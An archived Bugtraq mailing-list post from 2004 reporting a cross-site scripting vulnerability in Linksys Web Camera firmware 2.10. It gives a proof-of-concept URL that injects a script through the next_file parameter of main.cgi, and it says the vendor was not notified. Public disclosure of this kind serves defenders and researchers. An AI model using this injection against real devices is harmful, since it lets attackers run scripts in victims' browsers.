Bugtraq: Linksys Web Camera Cross-site Scripting Vuln

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

Linksys Web Camera Cross-site Scripting Vuln

From: Tyler Guenter aka scriptX <scriptX_ () hotmail com>
Date: 13 Jun 2004 14:06:58 -0000



Linksys Web Camera version 2.10 (only tested with 2.10) is vulnerable to a cross-site scripting vulnerability.

Example: http://www.host.com/main.cgi?next_file=poop&lt;script&gt;alert('scriptX :P');&lt;/script&gt;

Linksys was not notified (I didnt notify them about the file inclusion vuln either..)

By Date By Thread

Current thread:

Linksys Web Camera Cross-site Scripting Vuln Tyler Guenter aka scriptX (Jun 14)